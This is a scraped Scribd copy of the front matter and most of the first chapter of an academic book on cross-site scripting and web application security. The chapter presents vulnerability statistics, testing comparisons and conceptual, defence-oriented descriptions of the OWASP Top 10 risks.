100% found this document useful (1 vote)
289 views171 pages

Cross-Site Scripting Attacks PDF

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
289 views171 pages

Cross-Site Scripting Attacks PDF

Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 171

Cross-Site Scripting

Attacks
Security, Privacy, and Trust in Mobile
Communications

About the Series


Similar to computers, the mobile landscape is also facing various security and
privacy related threats. Increasing demand of sophisticated handheld mobile
devices including smartphones, tablets, and so forth, is making them an attrac-
tive target of security threats. Since these devices store confdential data of the
end users, and exploitation of vulnerabilities of the underlying technologies can
create a havoc on massive scale, it becomes inevitable to need to understand and
address the threats associated with them and to analyze the level of trust that can
be established for mobile communication scenarios.
Tis series will present emerging aspects of the mobile communication land-
scape, and focuses on the security, privacy, and trust issues in mobile communi-
cation based applications. It brings state-of-the-art subject matter for dealing with
the issues associated with mobile and wireless networks. Tis series is targeted for
researchers, students, academicians, and business professions in the feld.
If you’re interested in submitting a proposal for a book to be included in the
series, please email [email protected]

Series Editors:
Brij B. Gupta

Computer and Cyber Security


Principles, Algorithm, Applications, and Perspectives
Brij B. Gupta

Smart Card Security


Applications, Attacks, and Countermeasures
B.B. Gupta, Megha Quamara

Cross-Site Scripting Attacks


Classifcation, Attack and Countermeasures
B.B. Gupta and Pooja Chaudhary

For more information about this series please visit: https://www.crcpress.com/Secur


ity-Privacy-and-Trust-in-Mobile-Communications/book-series/SPTMOBILE
Cross-Site Scripting
Attacks
Classifcation, Attack, and
Countermeasures

B. B. Gupta and Pooja Chaudhary


First edition published 2020
by CRC Press
6000 Broken Sound Parkway NW, Suite 300,
Boca Raton, FL 33487-2742

© 2020 Taylor & Francis Group, LLC


CRC Press is an imprint of Taylor & Francis Group, LLC

International Standard Book Number-13: 978-0-367-36770-1 (hbk)

Reasonable eforts have been made to publish reliable data and information, but the author and
publisher cannot assume responsibility for the validity of all materials or the consequences of
their use. Te authors and publishers have attempted to trace the copyright holders of all mate-
rial reproduced in this publication and apologize to copyright holders if permission to pub-
lish in this form has not been obtained. If any copyright material has not been acknowledged
please write and let us know so we may rectify in any future reprint.

Except as permitted under U.S. Copyright Law, no part of this book may be reprinted, repro-
duced, transmitted, or utilized in any form by any electronic, mechanical, or other means,
now known or hereafer invented, including photocopying, microflming, and recording, or in
any information storage or retrieval system, without written permission from the publishers.

For permission to photocopy or use material electronically from this work, access www.
copyright.com or contact the Copyright Clearance Center, Inc. (CCC), 222 Rosewood Drive,
Danvers, MA 01923, 978-750-8400. For works that are not available on CCC please contact
[email protected]

Trademark notice: Product or corporate names may be trademarks or registered trademarks,


and are used only for identifcation and explanation without intent to infringe.

Visit the Taylor & Francis Web site at


http://www.taylorandfrancis.com
and the CRC Press Web site at
http://www.crcpress.com
Dedicated to my parents and family for their
constant support during the course of this book
—B. B. Gupta
Dedicated to my parents, siblings, and my mentor
for their guidance and motivation throughout
the journey of completion of this book.
—Pooja Chaudhary
Contents

List of Figures, xiii


List of Tables, xvii
Preface, xix
Acknowledgments, xxiii
Author Bio, xxv

CHAPTER 1 ◾ Security Flaws in Web Applications 1


1.1 WEB APPLICATION VULNERABILITIES 1
1.1.1 Fundamentals of Web Application
Architecture 2
1.1.2 Background and Motivation 3
1.1.3 Related Statistics 6
1.2 DIFFERENT DOMAIN-CENTRIC WEB
APPLICATION VULNERABILITIES 11
1.3 COMPREHENSIVE DETAIL OF MOST
DANGEROUS VULNERABILITIES 13
1.3.1 Overview of Web Application Vulnerabilities 15
1.3.2 Risk Path Assessment 15
1.3.3 Mapping Vulnerabilities with Risk Rating
Methods 18
vii
viii ◾ Contents

1.4 TOWARD BUILDING SECURE WEB


APPLICATIONS 19
1.5 CHAPTER SUMMARY 24
REFERENCES 25

CHAPTER 2 ◾ Security Challenges in Social


Networking: Taxonomy and Statistics 29
2.1 INTRODUCTION 29
2.1.1 Statistics of Social Networking 30
2.1.2 Recent Incidences on Social Networking
Platform 31
2.2 DISTINCT ATTACK CLASSES OF SOCIAL
PLATFORM 35
2.3 SOCIAL NETWORK DESIGN VS. PRIVACY
AND SECURITY GOALS 37
2.4 SOLUTIONS TO PREVENT AGAINST SOCIAL
MEDIA ATTACKS 45
2.5 CHAPTER SUMMARY 45
REFERENCES 49

CHAPTER 3 ◾ Fundamentals of Cross-Site Scripting


(XSS) Attack 53
3.1 OVERVIEW OF CROSS-SITE SCRIPTING
(XSS) ATTACK 53
3.1.1 Steps to Exploit XSS Vulnerability 54
3.1.2 Recent Incidences of XSS Attack 55
3.2 EFFECTS OF XSS ATTACK 55
3.3 CLASSIFICATION OF XSS ATTACK 57
3.3.1 Persistent XSS Attack 57
3.3.2 Non-Persistent Attack 59
3.3.3 DOM-Based XSS Attack 60
Contents    ◾   ix

3.4 APPROACHES TO DEFEND AGAINST


XSS ATTACK 60
3.4.1 Client-Side Approaches 66
3.4.2 Server-Side Approaches 66
3.4.3 Combinational Approaches 66
3.4.4 Proxy-Based Approaches 66
3.5 CHAPTER SUMMARY 68
REFERENCES 71

CHAPTER 4 ◾ Clustering and Context-Based


Sanitization Mechanism for
Defending against XSS Attack 75
4.1 INTRODUCTION 76
4.1.1 Views 76
4.1.2 Access Control List (ACL) 77
4.1.3 Context-Based Sanitization 77
4.2 PROPOSED APPROACH 78
4.2.1 Abstract Design 78
4.2.2 Detailed Design 79
4.2.2.1 Training Phase 80
4.2.2.2 Recognition Phase 80
4.2.3 Key Modules 84
4.3 EXPERIMENTAL TESTING AND EVALUATION
RESULTS 89
4.3.1 Implementation Details 92
4.3.2 Categories of XSS Attack Vectors 92
4.3.3 Detection Outcome 95
4.4 PERFORMANCE ANALYSIS 97
4.4.1 Using F-Measure 97
4.4.2 Using F-test Hypothesis 99
x ◾ Contents

4.4.3 Comparative Analysis 103


4.5 CHAPTER SUMMARY 103
REFERENCES 105

CHAPTER 5 ◾ Real-World XSS Worms and


Handling Tools 109
5.1 OVERVIEW OF XSS WORM 109
5.1.1 Real-World Incidences of XSS Worm 110
5.1.2 Case Study of the Famous Samy Worm 111
5.2 LIFE CYCLE OF XSS WORM 113
5.3 CATEGORIES OF XSS WORM 114
5.3.1 Exponential XSS Worm 115
5.3.2 XSS Flash Worm 115
5.3.3 Linear XSS Worm 117
5.4 HANDLING TOOLS 117
5.5 CHAPTER SUMMARY 117
REFERENCES 121

CHAPTER 6 ◾ XSS Preventive Measures and


General Practices 125
6.1 INTRODUCTION 125
6.2 XSS PREVENTION SCHEMES 126
6.2.1 Filtering 128
6.2.2 Escaping 128
6.2.3 Sanitization 130
6.2.4 Use Content Security Policy (CSP) 130
6.2.5 Data Validation 131
6.3 DIFFERENT PRACTICES FOR BROWSER
SECURITY 131
Contents    ◾   xi

6.4 OPEN RESEARCH DIRECTIONS 134


6.5 CHAPTER SUMMARY 136
REFERENCES 136

INDEX, 139
List of Figures

Figure 1.1 Percentage of web application as per


vulnerability severity level 4
Figure 1.2 Percentage of web application developed using
programming languages 5
Figure 1.3 Average number of vulnerabilities in each web
application as per severity level 6
Figure 1.4 Vulnerabilities found in the latest developing
technologies 7
Figure 1.5 Vulnerabilities found during static testing (in %) 8
Figure 1.6 Vulnerabilities found during dynamic testing
(in %) 9
Figure 1.7 Vulnerabilities detection rate SAST vs. DAST
(in %) 10
Figure 1.8 Top 10 web application vulnerabilities 11
Figure 1.9 Percentage of web applications corresponding
to diferent industries 12
Figure 1.10 Percentage of web applications with security
level 13

xiii
xiv ◾ List of Figures

Figure 1.11 Average number of attacks on diferent


industries 14
Figure 1.12 Consequences of attacks on users 14
Figure 1.13 A scenario depicting risk path exploitation 18
Figure 2.1 Prominent services of OSN 30
Figure 2.2 Popularity of OSN among internet users 31
Figure 2.3 Number of users engaged by diferent social
media platforms 32
Figure 2.4 Percentage of users by age group by Pew
Research Center 33
Figure 2.5 Total number of vulnerabilities detected on
social media platforms 33
Figure 2.6 Vulnerabilities detected on Twitter platform 34
Figure 2.7 Malware families identifed on social media (%) 36
Figure 2.8 Classes of social media attacks 37
Figure 3.1 Persistent XSS attack 59
Figure 3.2 Non-persistent XSS attack 60
Figure 3.3 DOM-based XSS attack 61
Figure 4.1 Abstract design view of the proposed
approach 79
Figure 4.2 Detailed design view of the proposed
approach 81
Figure 4.3 Flow chart of the proposed approach 83
Figure 4.4 Algorithm for clustered template generation 87
Figure 4.5 Algorithm of context-sensitive sanitization 90
List of Figures    ◾   xv

Figure 4.6 Detection rate of the proposed approach on


diferent testing platforms 91
Figure 5.1 Number of users infected by diferent worms 112
Figure 5.2 Stages during the life cycle of the XSS worm 114
Figure 6.1 Increase in the XSS vulnerability with years 127
List of Tables

Table 1.1 Brief Description of Web Application


Vulnerabilities 16
Table 1.2 Evaluation Scheme of Risk Path Identifed 18
Table 1.3 Mapping of Web Application Vulnerabilities
with Risk Path 20
Table 1.4 Evaluation of Web Application Vulnerabilities
against Risk Factors 24
Table 2.1 Description of Social Media Attacks 38
Table 2.2 Diferent Techniques to Prevent against Social
Media Attacks 46
Table 3.1 Recent Incidences of XSS Attack 56
Table 3.2 Efects of XSS Attack 58
Table 3.3 Client-Side Defensive Approaches against XSS
Attack 62
Table 3.4 Server-Side Defensive Approaches against XSS
Attack 64
Table 3.5 Combinational Defensive Approaches against
XSS Attack 67

xvii
xviii ◾ List of Tables

Table 3.6 Proxy-Based Defensive Approaches against XSS


Attack 69
Table 4.1 Suspicious HTML Elements 80
Table 4.2 List of HTML Elements and Teir Contexts 86
Table 4.3 Testing Platforms 92
Table 4.4 Categories of XSS Attack Vectors 93
Table 4.5 Observed Results on Diferent Testing
Platforms 96
Table 4.6 Performance Analysis by Calculating
F-Measure 98
Table 4.7 Statistics of XSS Attack Vectors Applied 101
Table 4.8 Statistics of XSS Attack Vectors Detected 102
Table 4.9 Summary of Comparison of Existing XSS
Defensive Methodologies with Our Work 104
Table 5.1 Real-World XSS Worm 111
Table 5.2 Tools and Techniques to Defend XSS 118
Table 6.1 HTML Entity Encoding 129
Preface

W ith the advancements of web development tech-


nologies and innovations like internet of things (IoT),
internet services are accessible even in remote areas smoothly. Te
proliferation of internet triggers abrupt escalation in the utiliza-
tion of the social network. Tese networks have interwoven into
the daily routine lives of people in the form of virtual platforms,
which facilitate ease of communication. Users connect with new
loved ones and re-establish the lost connections irrespective of the
geographical location. Te data shared by social actors is not only
benefcial to the diferent organizations to analyze and maintain
a strong customer relationship but also fascinates the attacker to
utilize it for his/her selfsh motive. Te highly concentrated topol-
ogy of the social networks, use of advanced features like AJAX
and Java Script, and a strong trust relationship among the social
actors are the key characteristics of the social sites being focused
by the attacker. Tese sites have become the hotbed of malicious
fles afecting the privacy of social media users.
Cross-Site Scripting attack comes under the umbrella of code
injection-based vulnerability and is ranked at no. 3 among all
the web application-based vulnerabilities. Tis has contami-
nated almost 80 percent of the popular web applications over
the internet today. Cross-Site Scripting Attacks: Classifcation,
Attack, and Countermeasures provides a detailed study of the XSS
attack. Tis book primarily focuses on the classifcation of the

xix
xx ◾ Preface

key contribution of the research work accomplished in the area


of XSS. Moreover, this book mainly addresses a novel mitigation
technique to protect against the XSS attack. It also puts light on
the open challenges and future research recommendations for
further progression in the XSS domain.
Specifcally, the chapters contained in this book are summa-
rized as follows:

Chapter 1: Security Flaws in Web Applications—Tis chapter


primarily focuses on the various types of security issues and
web-based vulnerabilities exploited by the data snooper to
launch various types of attacks.
Chapter 2: Security Challenges in Social Networking:
Taxonomy and Statistics—Tis chapter provides a classif-
cation of the diferent types of security attacks specifc to
the social platforms. It also highlights statistics depicting the
usage of social media among internet users, harmful efects
of using it on the young generation, and so on.
Chapter 3: Fundamentals of Cross-Site Scripting (XSS) Attack—
Tis chapter provides deep insight into Cross-Site Scripting
attack, its classifcation, incidences of the XSS attack, and
various consequences of the XSS attack. Furthermore, it
describes existing defensive methodologies against the XSS
attack with their strengths and weaknesses. It also provides
a comparative study of all these techniques.
Chapter 4: Clustering and Context-Based Sanitization
Mechanism for Defending against XSS Attack—Tis chap-
ter discusses what are the various challenges that exist in
the existing state-of-the-art techniques. Later on, it also
elaborates an efcient and robust mechanism to thwart XSS
attack on social network to overcome such challenges to
some extent. It also discusses its strengths and limitations.
Preface    ◾   xxi

Chapter 5: Real-World XSS Worms and Handling Tools—Tis


chapter discusses the types of XSS worms that can have a
severe impact on the social actors. Moreover, it also describes
the diferent types of tools that aid in detecting and mitigat-
ing the XSS attack from web applications.
Chapter 6: XSS Preventive Measures and General Practices—
Tis chapter discusses the general methods and practices
which can be applied at the development level of browsers
or web applications or both, to safeguard against the XSS
attack. It also sheds light on the path for future research
through highlighting the existing issues in currently avail-
able solutions.
Acknowledgments

First of all, we would like to pay our gratitude to God by bow-


ing our heads for lavishing on us with continuous blessings and
enthusiasm for completing this book. Writing a book is not a work
of an individual, but it is the outcome of the incessant support of
our loved ones. Tis book is the result of inestimable hard work,
continuous eforts, and assistance of loved ones. Terefore, we
would like to express our gratefulness to each one of them who
are linked with this book directly or indirectly, for their exquisite
cooperation and creative ideas for meliorating the quality of this
book. Along with this feeling, we would like to appreciate CRC
Press, Taylor & Francis Group, staf for their assistance and per-
sistent support. We are grateful, from the bottom of our hearts,
to our family members for their absolute love and uncount-
able prayers. Tis experience is both internally challenging and
rewarding. Terefore, again special thanks to all who helped us in
making this happen.

November 2019
B. B. Gupta
Pooja Chaudhary

xxiii
Author Bio

B. B. Gupta received PhD degree from Indian Institute of


Technology Roorkee, India, in the area of Information and
Cyber Security. He published more than 200 research papers in
International Journals and Conferences of high repute includ-
ing IEEE, Elsevier, ACM, Springer, Wiley, Taylor & Francis,
Inderscience, etc. He has visited several countries, i.e. Canada,
Japan, USA, UK, Malaysia, Australia, Tailand, China, Hong
Kong, Italy, Spain, etc. to present his research work. His biogra-
phy was selected and published in the 30th Edition of Marquis
Who’s Who in the World, 2012. Dr. Gupta also received Young
Faculty Research Fellowship award from Ministry of Electronics
and Information Technology, Government of India, in 2018. He is
also working as a principal investigator of various R&D projects.
He is serving as Associate Editor of IEEE Access, IEEE TII, and
Executive Editor of IJITCA, Inderscience. At present, Dr. Gupta
is working as Assistant Professor in the Department of Computer
Engineering, National Institute of Technology, Kurukshetra,
India. His research interest includes Information security, Cyber
Security, Mobile security, Cloud Computing, Web security,
Intrusion detection, and Phishing.

Pooja Chaudhary is currently pursuing her PhD degree


from National Institute of Technology (NIT), Kurukshetra,
Haryana, India, in Information and Cyber Security area. She has

xxv
xxvi ◾ Author Bio

completed her Master of Technology (MTech) degree in the area


of Cyber Security from National Institute of Technology (NIT),
Kurukshetra, Haryana, India. She has received her BTech degree
in Computer Science and Engineering from Bharat Institute of
Technology, Meerut, India, afliated to Uttar Pradesh Technical
University. Her areas of interest include Online Social Network
(OSN) security, big data analysis and security, database security
and cyber security, and internet of things security. She has pub-
lished a number of research papers with various reputed publish-
ers, i.e. IEEE, Springer, Wiley, Inderscience, and so on.
CHAPTER 1

Security Flaws in
Web Applications

T he advancement in technology along with the digitali-


zation of business drives us onto a new span of computing.
Innumerable web applications have been designed embracing new
and improved features. However, this progress leaves numerous
web application vulnerabilities that are destabilizing the secure
infrastructure of an organization. Terefore, this chapter concen-
trates on providing comprehensive details of the most prominent
and dangerous vulnerabilities that are contaminating the digital
world and afecting businesses worldwide. More elaborately, the
authors have encapsulated the related statistics of critical vulner-
abilities from reliable sources, giving insights into the security
threats corresponding to diferent business domains. Finally, a
comprehensive assessment of the vulnerabilities has been accom-
plished with respect to a method of rating identifed risk paths.

1.1 WEB APPLICATION VULNERABILITIES


Over the past decade, the internet has not only evolved into a
digital platform where people can search for anything, but has
1
2 ◾ Cross-Site Scripting Attacks

also become the lifeline of many businesses. Digitalization led


to rapid business invention. Web application lies at the core of
most business including the government sector, manufacturing
sector, fnance sector, and many more [5, 6, 9]. Tis transforma-
tion of business to the digital space helps an organization bring
its services at the edge, i.e. in the hands of the user. Consequently,
the user can access these services anywhere, anytime, thereby
spanning business boundaries. For most organizations, sof-
ware applications solely are businesses like e-commerce business.
Organizations disburse a huge amount of and extensive eforts
to provide a good digital experience to their customers; how-
ever, only protected and safe applications can serve their purpose
efectively. Yet developing sofware components without any vul-
nerability is still a dream. Instead of developing these sofware
applications as a single isolated component, today, organizations
use third-party components to develop applications through the
integration of discrete components. Tereby, new hidden vulner-
abilities exist and are being exploited at a faster rate, more than
the rate of identifcation and developing patches to fx them by the
organization [2, 20].

1.1.1 Fundamentals of Web Application Architecture


Web application builds upon multiple modules [19]. It consists of
a web server, web browser, application information residing in the
server, and the data store working at the backend that is accessed
by the application. Complex web application may include many
more modules; however, the basics remain the same.

• Web Server: It is a computer machine that executes web


server sofware to respond to the user’s request. It listens to
port 80 (http) or port 443 (https). It basically hosts various
web sites’ information including HTML fles, style sheets,
and JavaScript documents. Example: Microsof IIS web
server [17], Apache Web server [1], etc.
Security Flaws in Web Applications    ◾   3

Web Server
Request Software
Client Machine
Response
Application
Logic

• Web Browser: It is the computer application used to request


web content. It is used to retrieve web pages on the World
Wide Web (WWW) and displays it to the user. Example:
Mozilla Firefox, Google Chrome, Safari, etc.
• Application Logic/Information: It is the program logic that
helps in processing the user’s request. Basically, it interacts
with the request and interprets the parameters sent by the
browser to achieve its objective. For instance, a PHP inter-
preter residing at the server side helps it to process PHP
scripts at the server side itself.
• Back-End Data Store: It is the database which stores the
information accessed by the application logic. It may be
anything like fle database, SQL commands database, etc. It
is located on a diferent machine than the web server, con-
nected through a network.

1.1.2 Background and Motivation


It was discovered by the Web Application Vulnerabilities Statistics
report, in 2017, that of the total vulnerabilities reported, 17%
were highly severe vulnerabilities, 69% were moderately severe,
and 14% came under the category of low-severity vulnerabilities
[21]. Tese vulnerabilities can cause major fnancial and tech-
nical impacts to the organization depending upon the range of
severity level they lie in. Sofware applications may comprise
of vulnerabilities of diferent severity levels. Figure 1.1 depicts
the statistics of an application containing vulnerabilities corre-
sponding to their severity levels. Tere was an increase in highly
4 ◾ Cross-Site Scripting Attacks

FIGURE 1.1 Percentage of web application as per vulnerability severity


level.

severe vulnerabilities by 5% in 2018 as compared to 2017. Use of


untrusted third-party components or use of outdated components
may be the major cause for the exploitation of embedded vulner-
abilities, for example, use of default confguration or use of older
versions of sofware. Terefore, it is quite clear that more efort
has to be put into either developing secure and efective sof-
ware applications by incorporating secure coding practices in the
development phase, or designing and deploying defensive mecha-
nisms to detect these faws.
Te advancement of web design technologies is a great force
in developing dynamic and more user-friendly applications.
Moreover, the emergence of industry 4.0 and progression of the
World Wide Web incorporated a wide range of technologies
including client-side technology, server-side technology, and
advanced protocols.
Use of technologies like HTML5, AJAX, and JavaScript makes
applications more versatile in nature. Irrespective of the context,
every organization depends on sofware applications for business
expansion. Tese web applications are developed by using difer-
ent programming platforms like PHP, Java, ASP.NET, and others.
PHP is the most widely used technology for designing applications
Security Flaws in Web Applications    ◾   5

FIGURE 1.2 Percentage of web application developed using program-


ming languages.

[16]. Figure 1.2 shows that almost 44% of web applications are
designed using PHP as the base language, 26% are based on ASP.
NET, and so on. Other category includes languages like Python,
Ruby, etc. Also, it has been noted here that PHP and ASP.NET
are the widely used technologies for web application development
nowadays. Even though web application plays a crucial role in the
extension of the business, these contain some hidden faws that
the attacker might exploit. Tese faws may be categorized as high,
medium, and low severity level depending upon their impact on
the web application if the attacker exploits them. Figure 1.3 shows
the average number of vulnerabilities corresponding to each
severity level identifed in each web application developed using
one of the programming languages like PHP, ASP.NET, Java, and
others [15].
6 ◾ Cross-Site Scripting Attacks

FIGURE 1.3 Average number of vulnerabilities in each web application


as per severity level.

Development tools like PHP, ASP.NET, and Java are in trend


for designing web applications for any organization including the
government sector, fnance, manufacturing, IT, mass media, and
so on. Figure 1.4 reveals some statistics on the number of vulner-
abilities detected in web applications developed using these tools
and technologies over the years [3]. It is also noted here that there
has been a continuous fall in the number of vulnerabilities found
in web applications developed using PHP since 2016, meaning
patches have been developed for mitigating vulnerabilities; how-
ever, complete eradication of vulnerabilities from applications is
still a dream due to heterogeneity.

1.1.3 Related Statistics


Tere exist various vulnerabilities which are continuously taint-
ing web applications belonging to every domain; however, a report
by White Hat Security in 2017 [23] labels some of the frequently
found vulnerabilities. Identifcation of these vulnerabilities
depends on the type of assessment employed. To perform efec-
tive security assessment, organizations employ both static and
dynamic testing in tandem.
FIGURE 1.4 Vulnerabilities found in the latest developing technologies.
Security Flaws in Web Applications    ◾   7
8 ◾ Cross-Site Scripting Attacks

Static testing refers to analyzing the sofware application to


identify any kind of security faws during the development phase
itself. It may be of high, medium, or low severity. Figure 1.5 refects
the major class of vulnerabilities found during static testing of the
web applications. Unpatched library and application misconfgu-
ration are the two most prevalent web application vulnerabilities
because developers nowadays utilize the concept of modular pro-
gramming where each module is reusable and easily accessible,
but is less secure and uses default confguration as provided by
the developer.
Recently, to discover more faws, dynamic testing of the applica-
tion has become popular. Dynamic testing of the web application
is performed while the application is running in a real environ-
ment to detect those vulnerabilities which are unidentifed during
static testing. It is essential to perform this testing so that more
and more vulnerabilities can be identifed, thus yielding a more
secure and robust application. Figure 1.6 shows major classes of
the vulnerabilities which get identifed in dynamic testing [18].

FIGURE 1.5 Vulnerabilities found during static testing (in %).


Security Flaws in Web Applications    ◾   9

FIGURE 1.6 Vulnerabilities found during dynamic testing (in %).

Trough comparing static testing and dynamic testing results, it


is found that the prominent vulnerabilities of static testing are not
a part of vulnerabilities found during dynamic testing. However,
Cross-Site Scripting (XSS) [4] is the most dangerous vulnerabil-
ity as it is part of both testing. Tis means that developers lef
some loopholes, making XSS pave its way in web applications.
Consequently, mitigating XSS is of major concern and it is becom-
ing the most dangerous faw in web applications. Terefore, iden-
tifcation and mitigation of XSS vulnerability is an open research
challenge [7, 8, 10–14].
For a long period of time, security personnel paid attention
only to the development phase with the perception that they could
recognize all the vulnerabilities that might be present in the appli-
cation; however, it has been observed that few vulnerabilities are
identifed and fxed during the development phase. It raises major
security concerns and yields abundant threats to the application
when it is in the real environment, giving an open opportunity
10 ◾ Cross-Site Scripting Attacks

FIGURE 1.7 Vulnerabilities detection rate SAST vs. DAST (in %).

to the attacker to exploit the latent faws. Figure 1.7 revealed that
a major portion of the security error is found in dynamic testing
as compared to static testing [23]. It is shown here that the per-
centage of the vulnerabilities identifed and fxed during dynamic
testing is large in comparison with static testing, whether they are
of high-, critical-, or medium-severity level.
Rapid growth of more innovative and complex application
development techniques induces complex applications and raises
difculty exponentially in identifying and resolving vulnerabili-
ties. Insecure web applications are afecting every domain like
e-commerce, manufacturing, IT, public sector, etc. As the risk
imposed through the exploitation of latent vulnerabilities in web
applications can vary from low to high, it is vital to resolve them
earlier with accuracy. Another report divulged by the Open Web
Application Security Project OWASP [18] highlights the most
common top 10 vulnerabilities embedded in web applications
belonging to almost every sector. Figure 1.8 lists out these top 10
vulnerabilities.
Tese vulnerabilities exist because of many reasons includ-
ing insecure coding, use of modular programming without
security testing of components, use of default confgurations,
Security Flaws in Web Applications    ◾   11

FIGURE 1.8 Top 10 web application vulnerabilities.

security negligence during the development phase, and many


more. Terefore, OWASP provides information regarding the
existing most dangerous vulnerabilities which aids developers,
application designers, and organizations to remain updated about
these vulnerabilities so that these can be found earlier, thereby
reducing associated risk.

1.2 DIFFERENT DOMAIN-CENTRIC WEB


APPLICATION VULNERABILITIES
With the development of web 2.0, there has been a surge of
dynamic web applications in the digital world of the internet which
allows users to interconnect with them by providing user-specifc
data. In today’s modern era, web applications corresponding to
each business have become their lifelines. Each enterprise ofers
its services to its customers via its web applications including the
12 ◾ Cross-Site Scripting Attacks

FIGURE 1.9 Percentage of web applications corresponding to diferent


industries.
public sector, banking, e-commerce, IT sector, social media, and
any other business. Figure 1.9 highlights a portion of the digital
world occupied by diferent industries through their respective
web applications [21].
Tese web applications pave the way for organizations to
approach their customers by availing multiple online services.
However, only secure applications can impart these services
safely. In 2018, almost 83% of vulnerabilities were identifed in
web applications due to insecure coding. Because of technologi-
cal advancements, web applications are being designed and deliv-
ered faster than ever before, afecting their security and attracting
attackers to exploit latent vulnerabilities. Figure 1.10 shows that
approximately 32% of web applications have been ranked as
having a very poor level of security, giving rise to innumerable
cyberattacks.
Despite incorporating security features while developing web
applications, there are various hidden vulnerabilities that are
Security Flaws in Web Applications    ◾   13

FIGURE 1.10 Percentage of web applications with security level.

embedded in them. Tere may be many reasons for the weak


security level of web applications such as ignorance to secure cod-
ing, user unawareness, and default confguration, which help the
attackers trigger new attacks. Figure 1.11 highlights glimpses of
the average number of attacks that have been performed over dif-
ferent industries [22].
It has been identifed in a report [22], in 2018, that the conse-
quences of these attacks afect users of that particular industry.
Tere are many web applications that process users’ credentials,
store personal information, and consequently lead to leakage of
data. Figure 1.12 shows some of the consequences of attacks on
web applications.

1.3 COMPREHENSIVE DETAIL OF MOST


DANGEROUS VULNERABILITIES
Tis section ofers a brief overview of the top 10 vulnerabilities
unveiled by OWASP [18]. It provides information about diferent
14 ◾ Cross-Site Scripting Attacks

FIGURE 1.11 Average number of attacks on diferent industries.

paths exploited by an attacker to cause damage to an organization.


As every sector including banking, government, e-commerce,
fnancial, healthcare, social media, manufacturing, IT, and tele-
com make greater use of digital platforms to expand its business,
all are prone to various types of vulnerabilities embedded in web

FIGURE 1.12 Consequences of attacks on users.


Security Flaws in Web Applications    ◾   15

applications. Consequently, awareness of these faws is indispens-


able while developing applications.

1.3.1 Overview of Web Application Vulnerabilities


In this module, a comprehensive description of the top 10 most
dangerous vulnerabilities is illustrated. We have briefy explained
each of the web application vulnerabilities by illuminating only
the important factor behind it. Table 1.1 summarizes these vul-
nerabilities. Proper understanding of each of the vulnerabilities
including its root cause and exploitation method is mandatory to
come up with the solution to recognize and defend against these
vulnerabilities. It would be better for any organization to recog-
nize all the latent faws in the web application earlier so that the
associated risk level could be compensated for easily or may be
completely exempted from it.
It is completely dependent on the awareness of the security per-
sonnel to deal with these vulnerabilities. Sometimes, it might not
be easy to develop the defending solution even if you are familiar
with these faws. Te next section illustrates how these vulnerabil-
ities are exploited by the attacker through risk path identifcation.

1.3.2 Risk Path Assessment


A person with illegitimate intentions or an attacker delves into
a web application to search for every possible path that could be
exploited for imposing severe damage to the victim or targeted
organization. Each of these identifed paths represents a threat or
a risk to an organization. Associated risk may severely afect the
organization, thereby making it essential to build a robust and
reliable web application. Figure 1.13 illuminates the process of
path identifcation or exploitation by an attacker.
To assess the overall risk associated with the exploitation of
existing faws, there is a need to evaluate the probability asso-
ciated with each factor like threat agents, attack payload, and
security controls and integrate it with the overall impact on an
16 ◾ Cross-Site Scripting Attacks

TABLE 1.1 Brief Description of Web Application Vulnerabilities


S. R. Web Application
No. Vulnerability Description
V1. Injection Injection attack occurs as a result of the relay of
malicious data by the attacker as a command or
query which gets interpreted at the victim’s
browser, resulting in the alteration of information
fow or thef of sensitive data without user
consent.
V2. Broken Tis vulnerability provides privileges to the
Authentication attacker to either bypass or breach the
authentication mechanisms employed by the web
application. Consequently, the attacker might get
access to the user credentials, session tokens, and
IDs to impersonate as the legitimate user.
V3. Sensitive Data Tis attack comes out to be the result of the loss of
Exposure confdentiality between user and web application.
Tis results in the thef of sensitive data like
password, healthcare, and fnancial information
by the attacker to trigger crimes like credit card
fraud, cyber social clones, etc.
V4. XML External XML allows a user to refer to external resources in
Entities (XXE) XML document, which gets substituted into the
document by the XML parser during its
execution. Tis vulnerability is utilized by an
attacker to trick the XML parser to retrieve the
resources of his interest. External entities may be
capable of scanning internal ports, revealing
sensitive data, performing server-side request
forgery, and denial of service attack.
V5. Broken Access Users are allowed to perform their functionalities
Control according to the assigned privileges. Tis is
enforced through access control policies. When
these policies are not properly imposed then the
attacker compromises the entire web
application’s security by gaining admin
privileges, modifying the access rights of other
users, and misusing confdential information for
its selfsh motive.
(Continued )
Security Flaws in Web Applications    ◾   17

TABLE 1.1 (CONTINUED) Brief Description of Web Application


Vulnerabilities
S. R. Web Application
No. Vulnerability Description
V6. Security Tis type of vulnerability arises due to insecure
Misconfguration confgurations that are typically kept default in an
application.An attacker can easily identify them
through unpatched faws, unprotected fles,
directories, etc., to pave the way for other serious
attacks.
V7. Cross-Site It is a type of code injection vulnerability which
Scripting (XSS) exists due to the improper validation of the data
injected by any user. Tis faw is exploited by the
attacker to inject a malicious scripting code into
the web application which when processed by the
parser results in account hijacking, session token
stealing, and redirection to the attacker’s site.
V8. Insecure Tis vulnerability occurs due to the improper
Deserialization deserialization. Deserialization is the process of
converting some formatted data into objects. Tis
vulnerability is utilized by the attacker to trick
deserializer to process untrusted data resulting in
remote code execution, denial of service attack,
privilege escalation attack, etc.
V9. Using A web application may include various
Component components like libraries and frameworks to
with Known serve requests for the user. Tese components
Vulnerabilities always run with all the privileges as the
application. If the vulnerable component is
employed then the attacker may exploit the
weakness to gain control of the entire system or
may lead to data loss.
V10. Insufcient Tis is basically an opportunity to the attacker to
Logging and infect the system with the same strategy used
Monitoring earlier as these systems do not maintain proper
logs and monitor network activities. It results in
tampering or data loss and sometimes control
over the entire system.
18 ◾ Cross-Site Scripting Attacks

FIGURE 1.13 A scenario depicting risk path exploitation.

organization. Sometimes these paths can be easily identifed dur-


ing the development phase but not always. Likewise the associ-
ated damage may vary from no loss to complete loss of business.
Terefore, identifying the most dangerous vulnerabilities and
proposing mitigation mechanisms is the most pressing current
demand.

1.3.3 Mapping Vulnerabilities with Risk Rating Methods


As we have illustrated in Figure 1.9, various risk paths may exist
in web applications which may be exploited by the various threat
agents (or attackers). Each of these paths comprises of various
steps such as exploitation of vulnerability using attacking payload
(exploitation), identifcation of vulnerability with its dominance
(identifcation and dominance), and its impacts on business.
